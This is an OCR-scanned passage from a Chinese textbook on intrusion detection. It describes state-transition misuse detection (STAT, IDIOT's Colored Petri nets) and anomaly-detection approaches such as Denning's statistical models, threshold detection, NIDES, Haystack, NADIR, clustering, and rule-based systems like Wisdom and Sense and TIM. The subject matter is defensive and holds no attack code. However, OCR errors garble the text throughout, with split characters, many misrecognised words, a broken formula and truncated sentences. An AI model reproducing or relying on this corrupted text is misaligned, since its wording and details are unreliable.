J 不 适用 于 处 理 大 批量 的 数据 。 由 于 专家 系统 中 的 使 用 说 明 性 表达 一 般 用 来 解释 
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系统 实现 ,解释 器 总 是 比 翻译 器 慢 。 

没有 提供 对 连续 有 序数 据 的 任何 处 理 。 

不 能 处 理 不 确定 性 。 

考虑 到 在 知识 系统 中 由 于 其 他 规则 的 变化 影响 而 必须 改变 规则 ,维护 规则 系统 也 是 
一 个 具有 挑战 性 的 工作 。 

3) 状态 转换 方法 

执行 误 用 检测 的 状态 转换 方法 允许 使 用 最 优 模 型 匹配 技巧 结构 化 误 用 检测 问题 。 它 
们 的 速度 和 灵活 性 使 它们 具有 强 有 力 的 入 侵 检测 能 力 。 

状态 转换 法 使 用 系统 状态 和 状态 转换 表达 式 描述 和 检测 已 知人 侵 。 实 现 人 侵 检 测 状 
态 转 换 有 很 多 方法 ,其 中 最 主要 的 方法 是 状态 转换 分 析 和 有 人 色 Petri 网 。 

状态 转换 分 析 是 一 种 方法 , 它 使 用 高 级 状态 转换 图 标 分 析 和 检测 已 知 的 人 侵 攻 击 方 
式 。 这 种 方法 首先 在 STAR 系统 中 进行 研究 ,并且 扩展 到 UNIX 网 络 环境 USTAT 中 ， 
这 两 个 系统 都 是 California 大 学 开发 的 。 

状态 转换 图 标 是 贯穿 模型 的 图 形 化 表示 。 图 2-10 显示 了 一 个 状态 转换 图 标的 组 成 
以 及 如 何 使 用 它们 代表 一 个 友 列 。 节 点 代表 状态 , 弧 代 表 转 换 。 在 状态 转换 表格 中 ,表达 
入 侵 的 基本 思想 是 : 所 有 入 侵 者 部 是 从 拥有 优先 的 权限 出 发 ,并 且 利 用 系统 脆弱 性 获取 
一 些 成 果 。 开 始点 的 有 限 特 权 和 成 功 的 入 侵 都 能 作为 系统 状态 来 表达 。 

使 用 状态 转换 图 表示 入 侵 序列 时 ,系统 日 吴仪 限于 表示 导致 一 次 状态 改变 的 关键 活 
动 。 初 始 和 入 侵 状 态 之 间 的 路 径 可 能 相对 主观 。 因 此 ,两 个 人 能 拿 出 两 个 完全 不 同 的 代 
表 同 样 攻击 概要 的 状态 转换 图 标 。 每 一 个 状态 由 一 个 或 多 个 状态 声明 组 成 (状态 转换 图 
表 如 图 2-10 所 示 ) 。 


图 2-10 ”状态 转换 图 表 


状态 转换 分 析 系 统 利 用 有 限 状 态 机 图 表 模 拟 入 侵 。 入 侵 由 系统 初 妈 状态 到 入 侵 状 态 
的 一 系列 动作 组 成 ,初始 状态 代表 入 侵 执行 前 的 状态, 入侵 状态 代表 人 侵 完 成 时 的 状态 。 
系统 状 仿 根 据 系统 属性 进行 撒 述 。 转 换 由 一 个 用 户 动 作 驱 动 。 状 态 转 换 引 擎 保存 这 一 矢 
状态 转换 图 表 。 在 一 个 给 定时 间 内 ,假定 一 系列 动作 驱动 系统 到 图 表 中 的 未 个 特定 状态。 
当 一 个 新 的 动作 发 生 时 ,引擎 拿 它 与 每 个 图 表 对 比 , 看 是 否 驱 动 到 下 一 个 状态 。 如 末 这 个 
动作 驱动 到 结束 状态 ,指示 一 次 人 侵 , 则 以 前 的 转换 信息 被 送 到 决定 引擎 , 它 回 安全 人 员 
发 出 入侵 存在 的 霉 报 。 
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有 人 色 Petri 网 。 

优化 误 用 的 男 一 个 基于 状态 转换 的 方法 是 有 人 色 Petri 网 方法 ,由 Purdue 大 学 研制 。 
这 个 方法 在 IDIOT 系统 中 实现 。 

IDIOT 使 用 一 种 CP-Net 的 变种 表示 和 检测 人 侵 模 式 。 在 这 种 模式 下 ,一 个 人 侵 被 
表示 为 一 个 CP-Net。CP-Net 中 通过 令 牌 颜色 服务 模拟 事件 上 下 文 ,通过 审计 记录 驱动 
信号 匹配 ,并 通过 从 起 始 状态 逐步 移动 令 牌 指示 一 个 人 侵 或 攻击 ,并 当 模 式 匹 配 时 ,动作 
被 执行 。 

表面 上 看 ,这 种 方法 似乎 与 STAT 的 状态 转换 分 析 方 法 一 样 。 然 而 ,它们 之 间 有 明 
显 的 不 同 。 首先 ,在 STAT 中 入 侵 通 过 作用 在 系统 状态 上 的 效果 (也 束 是 人 侵 结 果 ) 进 行 
检测 。 在 IDIOT 中 ,和 人 入侵 是 通过 模式 匹配 构成 攻击 的 特征 进行 检测 。 在 STAT 中 ,是 在 
状态 中 放置 保护 ,而 在 IDIOT 中 ,保护 合并 在 转换 处 理 中 。 

在 IDIOT 系统 中 ,入 侵 行为 的 特征 被 表示 为 事件 和 它们 所 处 系统 环境 之 间 的 一 种 关 
系 模式 。 每 种 人 侵 模式 都 与 先前 具备 的 条 件 和 随后 发 生 的 动作 相关 。 这 种 关系 模式 可 以 
准确 地 描述 一 次 成 功 的 入 侵 及 其 企图 。CP-Net 图 的 顶点 代表 系统 状态 。 和 人 侵 模 式 包 括 
两 部 分 ,前面 的 部 分 是 条 件 ,后 面 的 部 分 是 相关 的 动作 。 

这 个 模式 匹配 模型 由 下 面 3 个 部 分 组 成 。 

JU 一 个 上 下 文 描述 ; 允许 匹配 相关 的 构成 和 人 侵 信号 的 各 种 事件 。 

@ 语义 学 : 容纳 了 几 种 混杂 在 同一 事件 流 中 的 人 侵 模 式 的 可 能 性 。 

一 个 动作 规格 : 当 模 式 匹 配 时 ,提供 某 种 动作 的 执行 。 

TCP/IP 连接 的 CP-Net 模式 如 图 2-11 所 示 。 


结束 状态 
TT After syn After syntack After ack 
SYN SYN+TACK ACK 


2-11 TCP/IP 连接 的 CP-Net 模式 


用 此 方法 进行 误 用 检测 有 许多 优点 ,具体 如 下 。 

Q) 速度 非常 快 。 在 一 个 非 优化 IDIOT 的 实验 中 ,每 小 时 激烈 活动 (产生 C2 审计 记 
录 ) 中 匹配 100 个 人 侵 模 式 ,检测 器 需要 135s。 与 Sun SPARC 平台 每 小 时 产生 大 约 6MB 
审计 数据 相 比 ,这 个 结果 表明 其 处 理 负 奏 少 于 5%。 

模式 匹配 引擎 独立 于 审计 格式 。 这 样 , 它 能 应 用 在 IP 包 和 其 他 问题 检测 中 。 

特征 在 跨越 审计 记录 方面 非常 方便 。 因 此 ,它们 能 在 不 同系 统 中 移动 。 

由 模式 能 根据 需要 进行 匹配 。 

时 间 的 顺序 和 其 他 排序 约束 条 件 可 以 直接 体现 出 来 。 
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2 异常 检测 

异常 检测 需要 建立 正常 用 户 行为 特征 轮廓 ,然后 将 实际 用 户 行 为 和 这 些 轮廓 进行 比 
较 , 并 标识 正常 的 偏离 。 也 就 是 说 ,异常 检测 是 根据 系统 或 用 户 的 非 正 第 行为 和 使 用 计算 
机 资源 的 非 正 常情 况 检 测 行 为 。 异 第 检测 模型 如 图 2-12 所 示 。 


命令 
系统 调用 
二 
CPU Ne pe 
网 络 连接 于 第 | 生态 


2-12 异常 检测 模型 


异常 检 测 依 菲 一 个 假定 : 用 户 表现 为 可 预测 的 、 一 致 的 系统 使 用 模式 。 例 如 ,如 于 
用 户 A 仅 在 上 午 9 氮 到 下 午 5 点 之 间 在 办 公 室 使 用 计算 机 , 则 用 户 A 在 晚上 的 活动 是 
措 第 的 ,就 可 能 是 入 侵 。 措 第 检测 试图 用 定量 方式 搬 述 第 规 的 或 可 接受 的 行为 ,以 标 
记 非 常规 的 、 浴 在 的 人 侵 行 为 。Anderson 做 了 如 何 通 过 识别 “ 寞 第 ”行为 检测 入 侵 的 早 
期 工作 报告 。Anderson 在 报告 中 提出 一 个 威胁 模型 ,将 威胁 分 为 外 部 同人、 内 部 次 透 
和 不 正当 行为 3 种 类 型 ,并 使 用 这 种 分 类 方法 开发 了 一 个 安全 监视 系统 ,可 以 检测 用 户 
的 寞 第 行为 。 外 部 回信 指 的 是 未 经 授权 计算 机 系统 用 户 的 入 侵 ; 内 部 竣 透 古 指 已 授权 
的 计算 机 系统 用 户 访 问 未 经 授权 的 数据 ;不 正当 行为 指 的 是 用 户 虽 经 授权 ,但 对 授权 
数据 和 资源 的 使 用 不 合法 或 滥用 授权 。 异 第 入 侵 检 测 的 主要 前 提 是 入 侵 性 活动 作为 
措 各 活动 的 于 集 。 考 处 这 样 的 情况 ,如 来 外 部 人 问 入 计算 机 系统 ,尽管 没有 人 危及 用 户 
宽 源 使 用 的 倾 回 和 企图 ,可 是 这 存在 一 种 入 侵 的 可 能 性 ,还 是 应 该 将 它 的 行为 当 作弄 
第 处 理 。 但 是 ,入 侵 活 动 和 常常 由 单个 活动 组 合 起 来 执行 ,单个 活动 却 与 异常 性 独立 无 
天。 理想 情况 古 寞 党 活动 集 同 入 侵 活动 集 一 样 。 这 样 ,识别 所 有 的 卉 第 活动 恰恰 正 古 
识别 了 所 有 的 入 侵 性 活动 , 结 末 就 不 会 童 成 错误 的 判断 。 可 是 ,入 侵 性 活动 并 不 总 是 
志 异 第 活动 相 件 。 这 里 存在 以 下 4 种 可 能 性 。 

Q) 入 侵 性 而 非 寞 第 。 活 动 具有 入 侵 性 却 因为 不 是 异 第 而 导致 不 能 检测 ,这 时 束 造 成 
漏 检 , 结 末 是 IDS 不 报告 人 侵 。 

非 入 侵 性 而 却 异 常 。 活 动 不 具 有 人 侵 性 ,而 因为 它 是 异 第 的 ,IDS 报告 人 侵 , 这 时 


非 人 侵 也 非 异 常 。 活 动 不 具 有 人 侵 性 ,IDS 没有 将 活动 报告 为 人 侵 ,这 属于 正确 
判断 。 


入 侵 且 开 凋 。 活 动 具 有 人 侵 性 并 因为 活动 是 开 币 的 ,IDS 将 其 报告 为 人 侵 。 
党 检测 的 基础 是 异常 行为 模式 系统 误 用 。 轮 廓 定义 成 度量 集 , 衡 量 用 户 特定 方面 
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的 行为 ,每 一 个 度量 与 一 个 国 伍 相 联系 。 右 设置 开间 的 国信 不 当 , 往 往 会 造成 IDS 出 现 
许多 误 报 轩 或 源 检 , 泌 检 对 于 重要 的 安全 系统 是 相当 人 危险 的 ,因为 IDS 给 安全 管理 员 造 
成 了 虚假 的 系统 安全 。 同 时 , 误 报 殴 会 增 添 安全 省 理 员 的 负担 ,也 会 导致 IDS 的 异常 检 
测 副 计算 开销 增 大 。 
因此 , 弄 稼 检测 的 完成 必须 验证 ,因为 无 法 判定 给 定 的 度量 集 是 否 完备 ,是 否 能 表示 
所 有 的 异常 行为 。 因 此 ,异常 检测 能 否 检测 出 所 有 感 兴趣 的 情况 ,并 体现 出 一 种 对 系统 的 
强壮 的 保护 机 制 , 仍 有 待 于 进一步 研究 。 
1) Denning 的 原始 模型 
Dorty Denning 在 其 1986 年 里 程式 的 论文 中 列 出 了 入 侵 检测 的 IDES 模型 ,并 主张 
一 个 系统 中 包括 4 个 统计 模型 。 每 个 模型 适合 于 一 个 特定 类 型 的 系统 度量 。 
(1) 可 操作 模型 。 
Denning 模型 的 第 一 个 是 可 操作 模型 。 这 个 模型 应 用 于 度量 。 例 如 ,在 一 个 特定 时 
间 间 隅 中 密码 失败 次 数 的 事件 计数 奉 。 这 个 模型 把 度量 和 一 个 国 值 进行 比较 , 当 度量 超 
过 国人 时 , 扔 发 一 个 异 前 。 这 个 重型 除 应 用 在 异 稼 检测 外 ,同样 也 适用 于 误 用 检测 。 
(2) 平均 和 标准 偏差 模型 。 
Denning 模型 的 第 二 个 检测 模型 提出 典型 的 数据 平均 和 偏差 描述 。 假 定 所 有 的 分 析 
货 邦 若 坦 系统 行为 度量 是 平均 和 标准 偏差 。 一 个 新 的 行为 观察 如 果 落 在 信任 间 隐 之 外 ， 
将 被 定义 为 异常 。 信 任 间 隔 定义 为 一 些 参 数 的 平均 人 的 标准 偏差 (Denning 假定 这 种 描 
述 应 用 到 事件 计数 需 .间隔 计数 硕 和 资源 度量 上 ,同时 也 提 及 应 给 这 些 参与 计算 的 数据 分 
配 权 值 ,最 近 的 数据 应 被 赋 子 一 个 较 大 的 权 仁 )。 
(3) 多 变量 模型 
Denning 模型 的 第 3 个 是 多 变量 模型 。 多 变量 模型 是 对 平均 和 标准 仿 差 模型 的 一 个 
扩展 ,是 基于 两 个 或 多 个 度量 执行 的 。 因 此 ,可 以 基于 这 个 度量 和 相关 的 男 一 个 度量 进行 
常 检测 ,而 并 不 是 严格 基于 一 个 度量 。 所 以 ,这 样 就 可 以 不 用 单独 基于 一 次 会 话 的 观察 
长 度 检测 一 个 异常 ,而 是 基于 这 次 会 话 长 度 和 使 用 的 CPU 周期 之 间 的 关系 进行 检测 。 
(4) 马尔 可 夫 模 型 。 
马尔 可 夫 模 型 是 Denning 模型 的 最 后 一 个 ,也 是 最 复 末 的 一 个 模型 。 在 这 个 模型 
中 ,检测 省 把 审计 事件 的 每 个 不 同类 型 作为 一 个 状态 变量 ,使 用 状态 转换 矩阵 摘 述 在 
不 同系 统 状态 转移 过 程 中 存在 的 概率 特征 , 即 状态 转换 的 概率 。 在 检测 过 程 中 ,使 用 
正常 情况 下 的 状态 转换 矩阵 ,针对 每 一 次 系统 的 实际 状态 变化 计算 其 发 生 的 概率 ,如 
末 概 率 很 小 , 则 认为 发 生 了 异常 。 这 束 允 许 检 测 兹 识别 不 寻 和 的 命令 和 事件 序列 ,而 
不仅 是 单一 事件 。 
2) 量化 分 析 
最 常用 的 异常 检测 方法 是 量化 分 析 , 其 中 检测 规则 和 属性 以 数值 形式 表述 。Den- 
ning 在 其 操作 模型 中 少 产 这 种 度量 。 该 技术 采用 计算 形式 进行 量化 分 析 , 包 括 人 简单 的 加 
法 计 自 到 比较 复杂 的 密码 学 计算 。 这 些 技术 的 绪 采 是 误 用 检测 信号 和 异 第 检测 统计 模型 
的 基础 。 下 面 换 述 几 个 第 用 的 量化 分 析 并 提供 一 个 使 用 这 些 技术 完成 数据 精 人 向 和 和 入侵 检 
测 目 标的 可 操作 的 系统 例子 。 
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(1) 国人 检测 。 

最 篆 见 的 量化 分 析 形 式 是 国信 检测 。 在 国信 检测 中 ,用 户 和 系统 行为 根据 茶 种 属性 
计数 进行 描述 ,这 些 计 数 是 有 某 种 许可 级 别 的。 一 个 国 值 的 典型 例子 是 一 个 系统 允许 有 
限 的 不 成 功 注 册 次 数 。 实 际 上 ,每 个 早期 的 入 侵 检 测 系 统 都 包含 一 个 检测 规则 ,根据 这 种 
度量 定义 一 个 人 侵 。 其 他 羡 值 包括 一 种 特定 类 型 的 网 络 连 接 数 ,企图 访问 文件 次 数 、 访 问 
文件 或 目录 次 数 和 访问 网 络 系统 次 数 等 。 在 国 值 检 测 中 ,一 个 固有 的 假定 是 在 一 个 特定 
的 时 间 间 隔 内 进行 度量 。 这 个 间隔 在 时 间 上 可 以 是 固定 的 。 例 如 , 国 值 在 每 天 的 特定 时 
间 重 置 为 零 。 也 可 以 在 一 个 滑动 窗口 上 运行 ,例如 ,每 隔 8 小 时 进行 一 次 度量 。 

(2) 司 发 式 国信 检测 。 

启发 式 阔 值 检测 在 简单 闽 值 检测 的 基础 上 ,进一步 使 它 适 合 于 观察 层次 。 这 个 处 理 
提高 了 检测 的 准确 性 ,尤其 在 一 个 非常 宽 的 用 户 范 围 或 目标 环境 中 执行 检测 的 情况 中 。 
例如 ,可 以 采用 有 异常 的 失败 注册 次 数 时 , 才 发 出 一 个 警告 的 异常 检测 规则 ,而 不 是 在 8 
小 时 期 间 失 败 注 册 数 超过 3 次 时 发 出 一 个 警告 的 国 值 检测 规则 .“ 有 异 第 ?能 通过 各 种 公式 
定义 。 例 如 ,采用 高 期 函数 先 计 算 失 败 注册 的 平均 数 , 随 后 将 失败 注册 次 数 与 附加 一 些 标 
准 偏 差 的 平均 值 进 行 比 较 。 

(3) 基于 目标 的 集成 检测 。 

另 一 个 有 价值 的 量化 分 析 度 量 是 基于 目标 的 集成 检测 。 这 是 对 于 一 个 系统 客体 中 一 
次 变化 的 检测 ,这 个 系统 客体 通常 不 应 该 发 生 不 可 预测 的 变化 。 对 于 一 个 这 样 的 集成 检 
测 , 最 常用 的 例子 是 使 用 一 个 消息 函数 计算 可 疑 系统 客体 的 加 密 校 验 和 。 在 校 验 和 被 计 
算出 后 将 其 保存 在 一 个 安全 的 地 方 , 系 统 定期 重新 计算 校 验 和 ,并 和 存储 的 参考 值 进行 比 
较 。 如 果 发 现 了 不 同 ,就 发 出 一 个 警告 。 

(4) 量化 分 析 和 数据 精简 。 

在 早期 的 人 侵 检 测 系 统 中 ,量化 分 析 最 有 意义 的 一 个 用 途 是 使 用 量化 度量 执行 数据 
精简 。 数 据 精 简 是 从 庞大 的 时 间 信 息 中 删除 过 剩 或 元 余 信息 的 过 程 。 这 减 小 了 系统 存储 
负 人 向 并 优化 了 基于 事件 信息 的 处 理 。 

NADIR 系统 是 一 个 使 用 量化 方法 文 持 有 将 数据 精简 的 例子 ,该 系统 由 Los Alamos 
国家 实验 室 的 计算 和 通信 分 公司 开发 。NADIR 使 用 数据 特征 轮廓 把 用 户 活动 从 审计 日 
志和 转换 成 量化 的 度量 向 量 , 它 们 大 部 分 是 线性 类 型 或 线性 类 型 和 顺序 数据 的 结合 。 特 征 
轮廓 在 时 间 ( 每 周 的 总 结 ) 和 系统 (每 个 系统 用 户 集 合 的 视图 ) 上 集成 。 精 简 后 的 数据 易于 
统计 ,也 易于 用 专 冢 进行 检测 。 

3) 统计 度量 

第 一 个 成 功 的 异 第 检测 系统 的 例子 是 基于 统计 度量 的 。 这 些 方法 包括 曾 在 前 面 提 到 
的 IDES.、 接 下 来 曾 述 的 NIDES 项 目 .Haystack 系统 中 使 用 的 方法 以 及 统计 分 析 系 统 。 

(1) IDES/NIDES, 

IDES 和 NIDES 由 SRI International 公司 的 研究 者 开发 ,是 最 早 的 两 个 人 侵 检 测 研 
究 系 统 。 它 们 都 是 混合 系统 ,包含 误 用 和 异常 检测 特性 ,这 里 主要 关注 统计 分 析 。 

在 IDES 和 NIDES 中 应 用 的 统计 分 析 技 术 支 持 为 每 个 用 户 和 系统 建立 和 维护 历史 
统计 特征 轮廓 。 这 些 特征 轮廓 被 定期 更 新 , 较 老 的 数据 被 老化 ,以 便于 特征 轮廓 适合 反映 
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用 户 行为 在 时 间 上 的 变化 。 

系统 维护 一 个 由 特征 轮廓 组 成 的 统计 知识 库 。 每 个 特征 轮廓 根据 一 个 度量 集 或 度量 
表示 每 个 用 户 的 正常 行为 。 每 天 一 次 ,基于 当天 的 用 户 活 动 ,新 的 审计 数据 锐 加 进 知 识 
库 , 并 通过 一 个 指数 退化 因子 老化 旧 问 量 。 

IDES 每 次 产生 一 个 审计 记录 ,产生 一 个 摘要 测试 统计 信息 。 这 个 被 称 作 IDES 分 数 
的 统计 结果 通过 下 面 的 公式 计算 。 

I = (0 LS 

式 中 ,(S…)C ! 是 相关 算 阵 或 向 量 的 道 ,(S…)t 是 向 量 的 转 置 。 每 个 S, 度量 行为 的 某 一 
方面 ,如 文件 访问 .使 用 的 终 病 和 使 用 的 CPU 时 间 。 

(2) Haystack., 

Haystack 是 由 美国 空军 开发 的 异 第 检测 系统 ,使 用 两 部 分 统计 异常 检测 方法 。 第 一 
个 部 分 决定 一 个 用 户 会 话 与 一 个 已 建立 的 入 侵 类 型 的 相似 度 。 这 个 度量 的 计算 过 程 
如 下 。 

由 系统 维护 一 个 用 户 行 为 度量 向 量 。 

对 每 个 人 侵 类 型 ,系统 将 每 个 行为 度量 同一 个 权 但 相关 联 , 反 映 度 量 与 给 定 人 
类 型 的 相关 性 。 

对 每 个 会 话 , 计 算 用户 行为 度量 回 量 并 与 域 回 量 进 行 比较 。 

由 注意 超过 域 设 置 的 这 些 行为 度量 。 

素 加 超出 域 的 度量 相关 的 权 但。 

基于 对 所 有 以 前 会 证 加 权 入 侵 分 数 分 布 , 米 用 系 加 和 会 话 分 配 一 个 可 疑 系 数 的 
万 八 。 

第 二 部 分 ,互补 统计 方法 检测 用 户 会 话 活动 与 正 篆 用 户 会 话 特征 轮廓 之 间 的 偶 差 。 
这 个 方法 查找 显著 偶 离 该 用 户 正 稼 历史 统计 特征 轮廓 的 会 话 统计 结果 。 

(3) 统计 分 析 。 

统计 异 冲 检测 分 析 起 初 是 以 伪 闪 成 一 个 合法 用 户 的 人 侵 者 为 目标 。 尽 管 统计 分 析 也 
可 以 检测 采用 以 前 未 知 脆弱 性 的 入侵 者 ,这 种 人 侵 不 可 能 被 任何 其 他 方法 检测 到 ,但 这 种 
说 法 仍然 没有 在 IDS 产品 使 用 中 得 到 证 实 。 早 期 的 研究 者 也 假设 统计 异 稼 检测 能 够 揭 
示 有 趣 的 `\ 有 时 是 可 疑 的 ,能 导致 发 现 安全 漏洞 的 活动 。 这 个 说 法 至 少 在 运行 于 Los Ala- 
mos 国家 实验 室 的 NADIR 中 得 到 证 实 , 该 实验 室 的 开发 者 置 报告 说 ,通过 使 用 NADIR 
获得 的 一 些 信 息 发 现 了 系统 和 安全 处 理 错误 ,还 发 现 了 可 以 改进 Los Alamos 的 系统 复 
末 性 的 一 般 方法 。 统 计 分析 的 为 外 一 个 优点 是 统计 系统 不 像 误 用 检测 系统 那样 需要 经 和 营 
更 新 和 维护 ,但 它 依 徘 几 个 因素 ,必须 很 好 地 选择 度量 ,元 分 精细 地 区 分 用 户 行为 。 也 束 
是 说 ,用 户 行为 的 变化 必须 在 相应 的 度量 上 产生 一 个 经 篆 的 、. 显 着 的 变化 。 如 果 条 件 满 
足 , 则 不 需要 对 系统 进行 附 市 的 更 改 , 并 且 统 计 分 析 能 够 有 效 地 检测 到 重要 行为 的 概率 
较 大 。 

当然 ,统计 分 析 系 统 也 有 了 明显 的 不 足 。 站 先 ,因为 设计 用 于 执行 批 醒 式 审计 记录 处 
理 , 因 此 没有 执行 月 动 啊 应 以 防止 遭受 损坏 的 能 力 。 早 期 系统 的 设计 是 在 集中 式 的 主 杠 
淋 目标 平台 上 进行 监控 跟踪 的 ,尽管 以 后 的 系统 试图 提出 实现 审计 数据 的 实时 分 析 , 但 涉 
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及 维护 和 更 新 用 户 特 征 轮廓 知识 库 造 成 系统 滞后 于 审计 结果 的 产生 。 

第 二 个 不 足 是 影响 统计 分 析 描 述 的 事件 范围 。 统 计 分 析 的 本 质 考虑 了 人 处 理事 件 时 间 
顺序 关系 的 能 力 。 在 大 多 数 系统 中 ,事件 发 生 的 确切 顺序 没有 以 一 个 属性 形式 提供 。 换 
句 话 说 ,这 些 事 件 被 限制 在 同一 层次 。 由 于 许多 指示 攻击 的 异常 依赖 于 这 样 的 顺序 事件 
关系 ,因此 这 种 情况 体现 了 这 种 方法 的 局 限 性 。 

在 使 用 量化 方法 (Denning 的 可 操作 模型 ) 的 情况 下 ,选择 合适 的 阔 值 和 范围 值 也 是 
困难 的 。 统 计 分 析 系 统 的 错误 警报 率 遍 ,这 会 寻 致 用 户 忽视 或 茶 用 系统 。 这 些 错 误 和 警报 
包括 两 种 类 型 : 错误 肯定 和 和 错误 否定 。 

4) 非 参 统计 度量 

早期 的 统计 方法 都 使 用 参数 方法 描述 用 户 和 其 他 系统 实体 的 行为 模式 , 即 预 先 假定 
了 被 分 析 数 据 的 基本 分 布 。 例 如 ,在 IDES MIDAS 的 早期 版 本 ,用 户 将 模式 的 分 布 假定 
为 高 斯 分 布 或 正 态 分 布 。 

当 假 定 不 正确 时 ,通过 这 些 假定 研究 的 问题 错误 率 高 。 当 研究 者 开始 搜集 系统 使 用 
模式 ,包括 诸如 系统 资源 使 用 等 属性 的 信息 时 ,发 现 分 布 不 正确 ,包括 这 些 度量 导致 较 高 

Tulane 大 学 提出 了 一 种 克服 这 些 问 题 的 方法 ,就 是 使 用 非 参 技术 执行 异常 检测 。 使 
用 该 方法 ,系统 可 以 容纳 可 预测 性 比较 低 的 行为 ,并 且 可 以 引入 在 参数 分 析 中 无 法 引入 的 

这 种 方法 涉及 非 参 数 数据 区 分 技术 ,尤其 是 群集 分 析 。 在 群集 分 析 中 ,收集 了 大 量 的 
历史 数据 (一 个 样本 集 ) 并 根据 一 些 评估 标准 (也 称 为 特性 ) 组 织 成 群 。 执 行 预 处 理 后 ,与 
一 特定 事件 流 ( 经 党 映射 成 一 具体 用 户 ) 相 关 的 特性 被 转化 成 回 量 表示 (如 X; 二 [了 ,ff;， 
… ,了 f, | 表示 一 个 n 维 状态 )。 和 群集 算法 用 来 把 和 器 量 分 组 成 行为 类 ,视图 使 每 个 类 的 成 员 尽 
可 能 紧密 ,而 不 同类 的 成 员 尺 可 能 分 离 。 

非 参 统计 异常 检测 的 前 提 是 根据 用 户 特性 把 表示 的 用 户 活动 数据 分 成 两 个 明显 区 别 
的 群 : 一 个 指示 异 第 活动 ;为 一 个 指示 正常 活动 。 

各 种 集群 算法 均 可 采用 。 这 些 算 法 包括 利用 简单 举例 度量 一 个 客体 是 否 属 于 一 个 
群 , 以 及 比较 复杂 的 概念 式 度 量 , 即 根据 一 个 条 件 集 合 对 客体 计 分 ,并 利用 这 个 分 数 决 定 
它 是 否 属于 一 个 特定 群 。 不 同 的 群集 算法 通常 服 务 于 不 同 的 数据 集合 分 析 目 标 。 

Tulane 的 研究 者 发 现 用 资源 利用 值 作为 评估 标准 ,达到 这 个 目标 最 好 的 群集 算法 是 
k 近邻 算法 。 该 算法 用 每 个 向 量 最 邻近 的 & 个 样本 分 组 每 个 向 量 。 在 样本 集中 是 一 个 
问 量 的 函数 ,而 不 是 一 个 固定 值 。 

使 用 该 分 析 技 术 的 实验 结果 显示 用 何 种 方式 构成 的 群 可 以 可 菲 地 对 用 户 的 行为 进行 
分 组 并 识别 。 非 参 方 法 的 优点 还 包括 进行 可 徘 精 简 事 件数 据 的 能 力 。 文 档 中 记录 的 精简 
效果 有 两 个 以 上 数量 级 的 改进 。 其 他 优点 是 ,与 参数 统计 分 析 相 比 ,检测 速度 和 准确 性 有 
所 提高 。 缺 点 是 ,涉及 超出 资源 范围 的 扩展 特性 将 会 降低 分 析 的 效率 和 准确 性 。 

5) 基于 规则 的 方法 

男 一 个 异常 检测 的 变 体 是 基于 规则 的 异常 检测 。 这 个 方法 的 潜在 假定 与 统计 异常 检 
测 相 关 的 假定 一 样 。 主 要 不 同 是 ,基于 规则 的 异常 检测 系统 使 用 规则 集 表示 和 存储 使 用 
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模式 。 本 市 主要 介绍 两 个 基于 规则 的 方法 : Wisdom and Sense 和 基于 事件 的 引导 机 
(TIM)., 

(1) Wisdom and Sense。 

第 一 个 基于 规则 的 异 第 检测 系统 是 由 Los Alamos 国家 实验 室 和 Oak Ridge 国家 实 
验 室 的 研究 者 开发 的 Wisdom and Sense(W&.S) 系 统 。WK&&.S 能 在 多 种 系统 平台 上 运行 
并 能 在 操作 系统 和 应 用 级 描述 活动 。 它 提出 两 种 移植 规则 库 的 方法 : 手工 输入 它们 ( 反 
映 一 个 琐 略 陈述 ) 和 从 历史 审计 记录 中 产生 它们 。 规 则 是 通过 执行 一 个 种 类 检查 从 历史 
审计 记录 中 派生 出 来 的 ,解释 根据 这 些 规 则 找到 的 模式 。 规 则 反映 了 系统 主体 和 客体 过 
去 的 行为 保存 在 一 个 树 结构 中 。 在 审计 记录 中 ,具体 的 数据 值 被 分 成 线程 类 ,通过 线程 类 
关联 上 操作 或 规则 集合 。 一 个 线程 类 的 例子 是 "所 有 记录 包含 同样 的 用 户 文 件 字 段 值 ”。 
每 当 一 个 线程 相关 的 活动 发 生 时 ,在 线程 中 规则 就 对 数据 起 作用 。 当 转换 发 生 时 ,它们 与 
匹配 线程 事件 进行 比较 ,决定 事件 是 否 匹配 活动 历史 模式 或 代表 一 个 异 第 ,异常 现象 就 是 
通过 这 种 方式 检测 出 的 。 

(2) 工 IM。 

Teng .Chen 和 Lu 在 数字 设备 公司 工作 时 提出 了 TIM 系统 。TIM 使 用 一 个 引导 方 
法 动态 产生 定义 人 侵 的 规则 。TIM 和 其 他 异常 监测 系统 的 区 别 是 ,TIM 是 在 时 间 顺 序 中 
查找 模式 ,而 不 是 在 单个 事件 中 查找 模式 ，。 

TIM 观察 历史 事件 记录 顺序 ,描述 事件 特定 顺序 发 生 的 概率 。 其 他 异常 检测 系统 度 
量 单 个 事件 发 生 是 否 偏 离 了 正常 活动 模式 。TIM 集中 针对 事件 发 生 的 顺序 ,检查 一 个 事 
件 链 是 否 与 基于 历史 事件 顺序 观察 预期 的 情况 一 致 。 

例如 ,设想 事件 El、E2 和 E3 顺序 地 列 在 审计 跟 踊 中 。TIM 基于 它 在 过 去 观察 的 历 
史 顺 序 描述 发 生 El 随后 发 生 E2, 然 后 发 生 E3 的 概率 。 当 TIM 分 析 历 史 事 件数 据 时 , 自 
动产 生 关 于 事件 的 顺序 规则 ,然后 在 一 个 规则 库 中 保存 这 些 规 则 。 由 于 TIM 对 事件 顺序 
进行 分 组 ,规则 库 需要 的 空间 比 基 于 定位 单个 时 间 的 系统 (如 W&S) 需 要 的 空间 显著 
减少 。 

如 宁 一 个 事件 顺序 匹配 了 规则 头 , 而 下 一 个 事件 不 在 审计 跟 蹊 中 , 则 被 认为 是 异 帝 
的 。 系 统 通 过 从 规则 库 中 删除 预测 性 很 少 的 规则 提炼 它 的 分 析 ( 如 来 规则 1 比 规则 2 成 
功 预测 更 多 事件 ,那么 规则 1 就 比 规则 2 更 具有 预测 性 ) 。 

与 统计 度量 比较 时 ,TIM 的 优点 是 显著 的 。 这 种 方法 非 第 适合 非 用 户 对 用 户 模 式 的 
环境 ,并 且 在 这 种 环境 下 ,每 个 用 户 在 时 间 上 表现 出 一 致 的 行为 。 一 个 大 公司 可 能 会 有 这 
种 环境 ,不 同 的 用 户 负 责 记 账 .管理 和 编程 ,不 同 的 职责 很 少 安 义 运作 。 这 种 方法 也 很 适 
合 威胁 与 一 些 事 件 相 关 , 而 不 是 与 系统 事件 实现 完全 相关 的 环境 。 最 后 ,这 种 方法 没有 与 
行为 渐变 相关 的 问题 ,对 行为 渐变 攻击 的 抵制 是 因为 语义 体现 到 了 检测 规则 中 。 行 为 渐 


